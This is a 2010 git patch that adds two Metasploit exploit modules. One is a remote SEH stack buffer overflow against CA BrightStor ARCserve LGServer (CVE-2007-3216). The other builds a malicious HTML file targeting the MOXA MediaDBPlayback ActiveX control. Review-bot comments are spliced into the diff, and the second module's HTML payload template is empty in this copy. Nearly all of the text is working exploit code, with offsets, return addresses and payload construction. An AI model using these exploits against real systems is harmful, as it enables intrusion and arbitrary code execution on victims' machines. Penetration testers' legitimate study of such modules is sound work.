From f517b88d9c7a6cd29979a1d87bdab813d9042ec9 Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Thu, 4 Nov 2010 22:19:26 +0000
Subject: [PATCH] added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb
git-svn-id: file:///home/svn/framework3/trunk@10904 4d416f70-5f16-0410-b530-b9f4589650da
---
.../windows/brightstor/lgserver_multi.rb | 112 ++++++++++++++++++
.../fileformat/moxa_mediadbplayback.rb | 107 +++++++++++++++++
2 files changed, 219 insertions(+)
create mode 100644 modules/exploits/windows/brightstor/lgserver_multi.rb
create mode 100644 modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb
new file mode 100644
index 0000000000..ae0fdc6083
--- /dev/null
+++ b/modules/exploits/windows/brightstor/lgserver_multi.rb
@@ -0,0 +1,112 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = AverageRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
+ for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,
+ an attacker could overflow the buffer and execute arbitrary code.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2007-3216' ],
+ [ 'OSVDB', '35329' ],
+ [ 'BID', '24348' ],
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 400,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ],
+ ],
+ 'DisclosureDate' => 'Jun 6 2007',
+ 'DefaultTarget' => 0))
+
+ register_options([ Opt::RPORT(1900) ], self.class)
+ end
+
+ def check
+
+ connect
+
+ sock.put("0000000019rxrGetServerVersion")
+ ver = sock.get_once
+
+ disconnect
+
+ if ( ver =~ /11.1.742/ )
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ return Exploit::CheckCode::Safe
+
+ end
+
+ def exploit
+
+ connect
+
+ rpc_commands = [
+ "rxsAddNewUser",
+ "rxsSetUserInfo",
+ "rxsRenameUser",
+ "rxsExportData",
+ "rxcReadSaveSetProfile",
+ "rxcInitSaveSetProfile",
+ "rxcAddSaveSetNextAppList",
+ "rxcAddSaveSetNextFilesPathList"
+ ]
+
+ rpc_command = 
rpc_commands[rand(rpc_commands.length)]
+
+ data = rand_text_alpha_upper(62768)
+
+ data[58468,8] = generate_seh_record(target.ret)
+ data[58476,payload.encoded.length] = payload.encoded
+
+ sploit = "0000062768" # Command Length Field
+ sploit << rpc_command # RPC Command
+ sploit << "~~" # Constant Argument Delimiter
+ sploit << data
+
+ print_status("Trying target #{target.name} with command '#{rpc_command}'...")
+ sock.put(sploit)
+
+ handler
+ disconnect
+
+ end
+
+end
diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
new file mode 100644
index 0000000000..2d6b9bf81a
--- /dev/null
+++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb 
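Review bot: The version match in `check` uses unescaped dots, `/11.1.742/`, so any character is accepted at those two positions; write it as `ver =~ /11\.1\.742/`. `sock.get_once` can return nil when the peer closes without answering, and the method then reports Safe although nothing was learned; a nil response is better reported as `Exploit::CheckCode::Unknown`. In both `check` and `exploit`, `disconnect` is skipped if `sock.put` or `sock.get_once` raises, so the connection should be released from an `ensure` block. Minor style: `rpc_commands[rand(rpc_commands.length)]` can be written `rpc_commands.sample` on Ruby 1.9 and later.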
@@ -0,0 +1,107 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = AverageRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
+ sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
+ an attacker may be able to execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'MC' ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'URL', 'http://www.moxa.com' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'DisablePayloadHandler' => 'true',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
+ ],
+ 'DisclosureDate' => 'Oct 19 2010',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
+ ], self.class)
+ end
+
+ def exploit
+ # Encode the shellcode.
+ shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+ # Create some nops.
+ nops = Rex::Text.to_unescape(make_nops(4))
+
+ # Set the return.
+ ret = Rex::Text.uri_encode([target.ret].pack('L'))
+
+ # Randomize the javascript variable names. 
+ vname = rand_text_alpha(rand(100) + 1)
+ var_i = rand_text_alpha(rand(30) + 2)
+ rand1 = rand_text_alpha(rand(100) + 1)
+ rand2 = rand_text_alpha(rand(100) + 1)
+ rand3 = rand_text_alpha(rand(100) + 1)
+ rand4 = rand_text_alpha(rand(100) + 1)
+ rand5 = rand_text_alpha(rand(100) + 1)
+ rand6 = rand_text_alpha(rand(100) + 1)
+ rand7 = rand_text_alpha(rand(100) + 1)
+ rand8 = rand_text_alpha(rand(100) + 1)
+
+ content = %Q|
+
+
+
+
+ |
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(content)
+ end
+
+end
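Review bot: The `content = %Q| ... |` template in `exploit` is empty in this view, so it cannot be confirmed that `shellcode`, `nops`, `ret`, `vname`, `var_i` and `rand1`..`rand8` are referenced at all; if the page lost the HTML during extraction the review of that part is incomplete, otherwise those locals are dead assignments and the generated file carries none of them. The eight near-identical `randN = rand_text_alpha(rand(100) + 1)` lines read better as `rand1, rand2, rand3, rand4, rand5, rand6, rand7, rand8 = Array.new(8) { rand_text_alpha(rand(100) + 1) }`, which also keeps one of them from drifting from the others. The only reference is the vendor home page, `[ 'URL', 'http://www.moxa.com' ]`, which gives a reader no way to locate the advisory behind the 'DisclosureDate'; add the specific advisory or CVE entry if one was published. The option description `'The file name.'` should say what the file is, e.g. `'The HTML file name to generate.'`.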